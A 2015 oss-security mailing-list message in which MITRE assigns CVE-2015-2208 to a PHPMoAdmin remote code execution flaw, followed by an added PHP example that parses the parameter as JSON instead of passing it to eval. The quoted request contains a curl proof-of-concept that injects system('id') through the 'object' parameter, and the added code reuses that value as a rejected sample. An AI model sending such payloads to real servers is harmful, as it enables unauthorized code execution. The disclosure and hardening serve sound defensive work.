Date: Wed,  4 Mar 2015 04:31:44 -0500 (EST)
From: cve-assign@...re.org
To: henri@...v.fi
Cc: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: Re: CVE request: PHPMoAdmin Unauthorized Remote Code Execution


> Can you assign 2015 CVE identifier for unauthorized remote code execution
> vulnerability in PHPMoAdmin <http://www.phpmoadmin.com/>

> curl "http://example.com/moadmin.php" -d "object=1;system('id');exit"

> http://seclists.org/fulldisclosure/2015/Mar/19

> 693:    eval('$obj=' . $obj . ';'); //cast from string to array

Use CVE-2015-2208.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
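
A hardened counterpart to the `eval` line quoted in the request, as an added example that is not part of the original message and is not phpMoAdmin's code or fix. It assumes PHP 7.3 or later and that the `object` parameter can be sent as JSON; `parse_object_param` and `MAX_OBJECT_BYTES` are hypothetical names.

```php
<?php
declare(strict_types=1);

// Added example; not phpMoAdmin code and not the project's fix.
// The line quoted in the report builds PHP source from the request:
//     eval('$obj=' . $obj . ';');
// so whatever follows the first ';' in the parameter runs as PHP.
// Here the parameter is only ever parsed as data (JSON is an assumption;
// the quoted comment says the original casts a string to an array).

const MAX_OBJECT_BYTES = 65536; // hypothetical size limit

/**
 * Hypothetical helper: decode the submitted "object" parameter into an array
 * without ever evaluating it as code.
 *
 * @throws InvalidArgumentException when the input is not a JSON object/array
 */
function parse_object_param(string $raw): array
{
    if (strlen($raw) > MAX_OBJECT_BYTES) {
        throw new InvalidArgumentException('object parameter too large');
    }
    try {
        // Associative arrays, depth capped at 32, exceptions instead of null.
        $doc = json_decode($raw, true, 32, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        throw new InvalidArgumentException('object parameter is not valid JSON', 0, $e);
    }
    if (!is_array($doc)) {
        // Scalars such as 1 or "x" are valid JSON but not a document.
        throw new InvalidArgumentException('object parameter must be an object or array');
    }
    return $doc;
}

// Constructed inputs: one legitimate document and the value from the report.
$samples = [
    '{"name":"alice","roles":["admin"]}',
    "1;system('id');exit",
];
foreach ($samples as $raw) {
    try {
        $doc = parse_object_param($raw);
        echo 'accepted: ', json_encode($doc), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```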
